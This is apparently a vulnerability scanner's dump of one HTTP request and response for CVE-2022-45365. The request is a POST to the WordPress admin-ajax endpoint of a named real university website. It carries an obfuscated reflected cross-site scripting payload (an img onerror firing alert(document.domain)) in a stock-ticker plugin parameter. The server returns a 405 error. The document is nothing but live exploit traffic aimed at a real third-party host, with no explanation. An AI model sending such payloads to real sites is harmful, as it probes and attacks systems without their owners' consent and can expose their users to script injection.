[CVE-2022-45365] Dumped HTTP request for https://www.tbwl.esrc.unimelb.edu.au/wp-admin/admin-ajax.php


POST /wp-admin/admin-ajax.php HTTP/1.1
Host: www.tbwl.esrc.unimelb.edu.au
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/139.0.0.0 Safari/537.36
Connection: close
Content-Length: 168
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

action=stockticker_symbol_search_test&symbol=test&endpoint=%3Cimg+src%3Dx+onerror%3D%26%23x61%3B%26%23x6c%3B%26%23x65%3B%26%23x72%3B%26%23x74%3B%28document.domain%29%3E
[CVE-2022-45365] Dumped HTTP response https://www.tbwl.esrc.unimelb.edu.au/wp-admin/admin-ajax.php

HTTP/1.1 405 Method Not Allowed
Connection: close
Content-Length: 422
Allow: GET, HEAD, OPTIONS
Content-Type: text/html; charset=utf-8
Date: Wed, 06 Aug 2025 15:19:01 GMT
Server: AmazonS3
Via: 1.1 598d87b7aabfe9af537b98f78145120e.cloudfront.net (CloudFront)
X-Amz-Cf-Id: oqu9lVo7_YlneapvhzHlnQ34nkwG1J4NZ3uVEzuEVIPDrAuirQ0DOA==
X-Amz-Cf-Pop: IAD55-P6
X-Cache: Error from cloudfront

<html>
<head><title>405 Method Not Allowed</title></head>
<body>
<h1>405 Method Not Allowed</h1>
<ul>
<li>Code: MethodNotAllowed</li>
<li>Message: The specified method is not allowed against this resource.</li>
<li>Method: POST</li>
<li>ResourceType: OBJECT</li>
<li>RequestId: YT0WFE9NF0WMD10G</li>
<li>HostId: 5DrWZEEjomnMYbFs4r1o6ZpoQZOeDE2k2GZKqhD2Z95TVAoC7mQUwPXeFxBFTR0wjPGKvSCVp/k=</li>
</ul>
<hr/>
</body>
</html>

